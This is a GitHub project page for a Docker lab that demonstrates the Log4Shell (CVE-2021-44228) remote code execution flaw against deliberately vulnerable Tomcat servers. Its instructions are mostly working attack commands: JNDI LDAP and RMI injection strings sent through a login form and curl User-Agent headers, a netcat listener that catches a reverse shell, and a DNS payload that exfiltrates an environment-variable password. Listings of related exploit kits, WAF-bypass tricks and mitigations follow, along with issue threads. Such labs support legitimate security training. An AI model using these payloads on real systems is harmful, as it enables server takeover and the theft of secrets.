An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Overview

log4j-poc

An LDAP RCE exploit for CVE-2021-44228 Log4Shell

Description

The demo Tomcat 8 server on port 8080 has a vulnerable app (log4shell) deployed on it and the server also vulnerable via user-agent attacks.

The remote exploit app in this demo is based on that found at https://github.com/kozmer/log4j-shell-poc

This demo tomcat server (Tomcat 8.5.3, Java 1.8.0u51) has been reconfigued to use Log4J2 for logging - a non-standard configuration.

A newer Bitnami server is now available on port 8888. It is also is configured for Log4J2 logging and is running Tomcat 9.0.55 and OpenJDK 11.0.13.

The RMI exploit against the Tomcat 9 / Java 11 server is described here: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) by Michael Stepankin

The detection script will check for user-agent vulnerablities and is from here: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

Prerequisites

This code requires Docker and Docker Compose

Installation

git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build

Run Web App Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. Navigate to the web app on port 8080
    1. Navigate to http://10.10.10.31:8080/log4shell
      1. Enter the username: admin
      2. Enter the password: password
      3. Select the "login" button
      4. See the welcome screen
    2. Return to login at http://10.10.10.31:8080/log4shell
      1. Enter the username ${jndi:ldap://172.16.238.11:1389/a}
      2. Select the "login" button
      3. Check for connection on your nc listener

Run a User Agent Attack Demo

  1. Setup your docker listener in the first terminal
    1. nc -lv 10.10.10.31 9001
  2. Start the docker containers in a second terminal
    1. docker-compose up
  3. In a third terminal, run the following. The second IP is the docker host
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

Run a DNS Exfil Demo on Recent Java 11 version

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. The vulnerable web server will attempt to do a TXT lookup at the given IP. See log4j-dns_exfil.pcap

Run an RMI RCE Demo on Recent Java 11 version

I am having issues with command line arg for ping target. So you have to compile yourself.

Compile

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In another terminal, Login to the cve-poc
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. Kill running RMIServerPOC instance
  4. Change to rmi-poc directory
    1. cd /home/user/rmi-poc
  5. Edit RMIServerPOC.java to change 10.10.10.31 to your ping target
  6. Recompile
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. Run the Server
    1. javac -cp catalina.jar:. RMIServerPOC 127.0.0.1

Run RMI RCE Demo

  1. Start the docker containers in a terminal
    1. docker-compose up
  2. In a second terminal, run the following. The IP is the ip address of the docker host
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. The vulnerable web server will download a serialized malicious class from the RMI server for a class which already exists in the Tomcat environment.
  4. This will ping the IP address defined in the compile section.

Detect UA Vulnerability

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. you will have to kill the process, not sure yet why this hangs
You might also like...

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability

Log4shell-hunter - Scanner that scans local files for log4shell vulnerability. Does bytecode analysis so it does not rely on metadata. Will find vulnerable log4j even it has been self-compiled/repackaged/shaded/nested (e.g. uberjar, fatjar) and even obfuscated.

Feb 27, 2022

JNDI-Exploit is an exploit on Java Naming and Directory Interface (JNDI) from the deleted project fromthe user feihong on GitHub.

JNDI-Exploit JNDI-Exploit is a fork from the deleted project ftom the user feihong-cs on GitHub. To learn more about JNDI and what you can do with thi

Dec 6, 2022

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit Proof of Concept

Log4Shell Zero-Day Exploit if attacker manage to log this string ${jndi:ldap://someaddresshere/param1=value1} to log4j it somehow loads the class/java

Oct 9, 2022

A Basic Java Application Vulnerable to the Log4Shell RCE

A Basic Java Application Vulnerable to the Log4Shell RCE

This is a basic, minimal, intentionally vulnerable Java web application including a version (2.14.1) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability.

Nov 9, 2022

Security engine for Java (authentication, authorization, multi frameworks): OAuth, CAS, SAML, OpenID Connect, LDAP, JWT...

Security engine for Java (authentication, authorization, multi frameworks): OAuth, CAS, SAML, OpenID Connect, LDAP, JWT...

pac4j is an easy and powerful security engine for Java to authenticate users, get their profiles and manage authorizations in order to secure web appl

Dec 30, 2022

Huntress Log4Shell Testing Application

Huntress Log4Shell Testing Application This repo holds the source for the HTTP and LDAP servers hosted here. Both services are hosted under one Java a

Nov 25, 2022

Disables JNDI lookup globally using Java agent instrumentation, mitigation for Log4Shell attacks.

NoJNDI This is a simple proof of concept agent that disables JNDI lookups globally across the JVM. This is useful for mitigating the Log4Shell attack,

Dec 29, 2021

JNDI-Exploit-Kit

JNDI-Exploit-Kit

JNDI-Exploit-Kit Disclaimer This is a forked modified version of the great exploitation tool created by @welk1n

Dec 7, 2022

LOG4J Java exploit - WAF and patches bypass tricks

LOG4J Java exploit - WAF and patches bypass tricks

🤝 Show your support - give a ⭐️ if you liked the content | SHARE on Twitter | Follow me on 🐱‍💻 ✂️ 🤬 LOG4J Java exploit - WAF and patches bypass tr

Jan 7, 2023
Comments
  • cve-neo: build Dockerfile http 503 Error : wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

    cve-neo: build Dockerfile http 503 Error : wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

    wget Error 503 wget -S -c https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz --2022-02-06 13:45:18-- https://dlcdn.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz Resolving dlcdn.apache.org (dlcdn.apache.org)... 151.101.2.132, 2a04:4e42::644 Connecting to dlcdn.apache.org (dlcdn.apache.org)|151.101.2.132|:443... connected. HTTP request sent, awaiting response... HTTP/1.1 503 Backend unavailable, connection timeout

    Solution change to downloads.apache : RUN wget https://downloads.apache.org/maven/maven-3/3.8.4/binaries/apache-maven-3.8.4-bin.tar.gz

    opened by buchmann 1
  • Missing packet capture for RMI exploit

    Missing packet capture for RMI exploit

    I noticed you didn't have an example packet capture of a successful RMI exploit, so I've attached one to this issue.

    The relevant data is:

    • TCP stream 0: HTTP request with malicious lookup string in the user agent header
    • TCP stream 1: RMI initialization (?)
    • TCP stream 2: Malicious serialized Java object
    • TCP stream 3: Reverse shell communication

    rmi_exploit.pcap.zip

    opened by SeanPesce 0
  • Exploit.class did not connect to NC session 'nc -lv localhost 9001'

    Exploit.class did not connect to NC session 'nc -lv localhost 9001'

    Fix: Docker Issue had to set a firewall rule to allow connections from the Exploit.class container to my local host added in : /etc/firewalld/zones/public.xml

    restart the firewall : systemctl restart firewalld

    opened by buchmann 0
Owner
null
Log4Shell sample vulnerable application (CVE-2021-44228)

Log4Shell sample vulnerable application (CVE-2021-44228)

StandB 5 Dec 26, 2021
CVE-2021-44228 (Log4Shell) Proof of Concept

CVE-2021-44228 (Log4Shell) Proof of Concept Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect ag

Sunnyvale S.r.l. 5 Mar 18, 2022
PCRE RegEx matching Log4Shell CVE-2021-44228 IOC in your logs

Log4Shell-Rex The following RegEx was written in an attempt to match indicators of a Log4Shell (CVE-2021-44228 and CVE-2021-45046) exploitation. If yo

back2root 286 Nov 9, 2022
A mitigation for CVE-2021-44228 (log4shell) that works by patching the vulnerability at runtime. (Works with any vulnerable java software, tested with java 6 and newer)

Log4jPatcher A Java Agent based mitigation for Log4j2 JNDI exploits. This agent employs 2 patches: Disabling all Lookup conversions (on supported Log4

null 45 Dec 16, 2022
Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

Log4Shell RCE exploit using a gadget class. Not dependent on an old JDK version to work.

null 8 Jan 4, 2022
Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a `writeToParcel`/`createFromParcel` serialization mismatch in `OutputConfiguration`

null 52 Dec 30, 2022
CVE-2021-44228 (Apache Log4j Remote Code Execution)

CVE-2021-44228 (Apache Log4j Remote Code Execution) all log4j-core versions >=2.0-beta9 and <=2.14.1 The version of 1.x has other vulnerabilities, it

Roxas77 10 Apr 23, 2022
log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch

log4j2-scan is a single binary command-line tool for CVE-2021-44228 vulnerability scanning and mitigation patch. It also supports nested JAR file scan

Logpresso GitHub 839 Dec 29, 2022
Local Bytecode Scanner for the Log4JShell Vulnerability (CVE-2021-44228)

?? Log4JShell Bytecode Detector Log4jShell Bytecode Detector is an open source tool that helps identify if a jar file is affected by the critical CVE-

CodeShield GmbH 49 Apr 23, 2022